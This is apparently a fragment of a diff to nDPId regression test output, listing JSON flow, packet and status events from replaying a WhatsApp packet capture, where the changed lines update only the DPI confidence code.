00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655074455881,"flow_last_seen":1655074455881,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655074455881,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1655074455881,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655074455881,"pkt":"eJS0JASgYDjgxTWgCABFAAA8sLNAAD8GUZ7AqAJkszzDIaZ+FGbSFVW5AAAAAKAC\/\/\/0VAAAAgQFtAQCCAoGIjFpAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":391,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1655074455913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655074455913,"pkt":"eJS0JASgYDjgxTWgCABFAAA0sLRAAD8GUaXAqAJkszzDIaZ+FGbSFVW6wmRwfoAQAKwXRAAAAQEICgYiMYo6n51\/"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":392,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1655074455915,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655074455915,"pkt":"eJS0JASgYDjgxTWgCABFAAA4sLVAAD8GUaDAqAJkszzDIaZ+FGbSFVW6wmRwfoAYAKzR8QAAAQEICgYiMYs6n51\/RUQAAQ=="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074455881,"flow_last_seen":1655074455915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655074455915,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":393,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074455881,"flow_last_seen":1655074455915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655074455915,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42622,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655074681295,"flow_last_seen":1655074681295,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655074681295,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1655074681295,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655074681295,"pkt":"eJS0JASgYDjgxTWgCABFAAA81rZAAD8GK4vAqAJkszzDMeNWFGYDhPITAAAAAKAC\/\/\/bRgAAAgQFtAQCCApIjv1aAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1655074681328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655074681328,"pkt":"eJS0JASgYDjgxTWgCABFAAA01rdAAD8GK5LAqAJkszzDMeNWFGYDhPIU+mPdyoAQAVfaOgAAAQEICkiO\/XvslGmN"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1655074681508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655074681508,"pkt":"eJS0JASgYDjgxTWgCABFAAA41rhAAD8GK43AqAJkszzDMeNWFGYDhPIU+mPdyoAYAVeUNgAAAQEICkiO\/i7slGmNRUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074681295,"flow_last_seen":1655074681541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655074681541,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655074681295,"flow_last_seen":1655074681541,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655074681541,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58198,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":406,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":406,"packets-processed":405,"total-skipped-flows":0,"total-l4-payload-len":32915,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":51,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":51,"total-idle-flows":39,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":332,"global_ts_msec":1655075014427} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655075014427,"flow_last_seen":1655075014427,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655075014427,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1655075014427,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655075014427,"pkt":"eJS0JASgYDjgxTWgCABFAAA84Y1AAD8GIMTAqAJkszzDIacsFGb7al66AAAAAKAC\/\/87hQAAAgQFtAQCCAoGKrcsAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1655075014457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655075014457,"pkt":"eJS0JASgYDjgxTWgCABFAAA04Y5AAD8GIMvAqAJkszzDIacsFGb7al674\/2+D4AQAKzv2QAAAQEICgYqt1ks76qT"} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1655075014458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655075014458,"pkt":"eJS0JASgYDjgxTWgCABFAAA44Y9AAD8GIMbAqAJkszzDIacsFGb7al674\/2+D4AYAKyqhgAAAQEICgYqt1ss76qTRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655075014427,"flow_last_seen":1655075014459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655075014459,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655067574156,"flow_last_seen":1655067574418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655075014609,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655075014427,"flow_last_seen":1655075014459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655075014459,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":42796,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655067574156,"flow_last_seen":1655067574418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655075014609,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":45334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":414,"packets-processed":413,"total-skipped-flows":0,"total-l4-payload-len":34188,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":52,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":52,"total-idle-flows":40,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":339,"global_ts_msec":1655075686356} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655075686356,"flow_last_seen":1655075686356,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655075686356,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1655075686356,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655075686356,"pkt":"eJS0JASgYDjgxTWgCABFAAA8QvtAAD8Gv1bAqAJkszzDIaiQFGbxmYdKAAAAAKAC\/\/\/ajwAAAgQFtAQCCAoGNPf0AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1655075686389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655075686389,"pkt":"eJS0JASgYDjgxTWgCABFAAA0QvxAAD8Gv13AqAJkszzDIaiQFGbxmYdLWdXXDoAQAKw7swAAAQEICgY0+BVuVC2V"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1655075686390,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655075686390,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Qv1AAD8Gv1jAqAJkszzDIaiQFGbxmYdLWdXXDoAYAKz2XwAAAQEICgY0+BduVC2VRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655075686356,"flow_last_seen":1655075686391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655075686391,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068204945,"flow_last_seen":1655068205140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655075686549,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068071917,"flow_last_seen":1655068072357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655075686549,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655075686356,"flow_last_seen":1655075686391,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655075686391,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":43152,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068204945,"flow_last_seen":1655068205140,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655075686549,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":41664,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655068071917,"flow_last_seen":1655068072357,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655075686549,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":52152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":422,"packets-processed":421,"total-skipped-flows":0,"total-l4-payload-len":35461,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":53,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":53,"total-idle-flows":42,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":347,"global_ts_msec":1655078415178} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655078415178,"flow_last_seen":1655078415178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655078415178,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1655078415178,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655078415178,"pkt":"eJS0JASgYDjgxTWgCABFAAA8CblAAD8G+IjAqAJkszzDMbaMFGYZMLRzAAAAAKAC\/\/8IFAAAAgQFtAQCCArHDabLAAAAAAEDAwk="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1655078415208,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655078415208,"pkt":"eJS0JASgYDjgxTWgCABFAAA0CbpAAD8G+I\/AqAJkszzDMbaMFGYZMLR0Md5NzYAQAKysVQAAAQEICscNpurDrEZZ"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1655078415272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655078415272,"pkt":"eJS0JASgYDjgxTWgCABFAAA4CbtAAD8G+IrAqAJkszzDMbaMFGYZMLR0Md5NzYAYAKxmxQAAAQEICscNpynDrEZZRUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078415178,"flow_last_seen":1655078415302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655078415302,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078415178,"flow_last_seen":1655078415302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655078415302,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46732,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655078417966,"flow_last_seen":1655078417966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655078417966,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1655078417966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655078417966,"pkt":"eJS0JASgYDjgxTWgCABFAAA8aDVAAD8GmgzAqAJkszzDMeYCFGZBxg2JAAAAAKAC\/\/96TQAAAgQFtAQCCApIyAG3AAAAAAEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1655078418007,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655078418007,"pkt":"eJS0JASgYDjgxTWgCABFAAA0aDZAAD8GmhPAqAJkszzDMeYCFGZBxg2KkGSxpoAQAVfcVQAAAQEICkjIAeVbmS2L"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1655078418014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655078418014,"pkt":"eJS0JASgYDjgxTWgCABFAAA4aDdAAD8Gmg7AqAJkszzDMeYCFGZBxg2KkGSxpoAYAVeW\/gAAAQEICkjIAetbmS2LRUQAAQ=="} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078417966,"flow_last_seen":1655078418062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655078418062,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655078417966,"flow_last_seen":1655078418062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655078418062,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":58882,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655078418150,"flow_last_seen":1655078418150,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655078418150,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46598,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
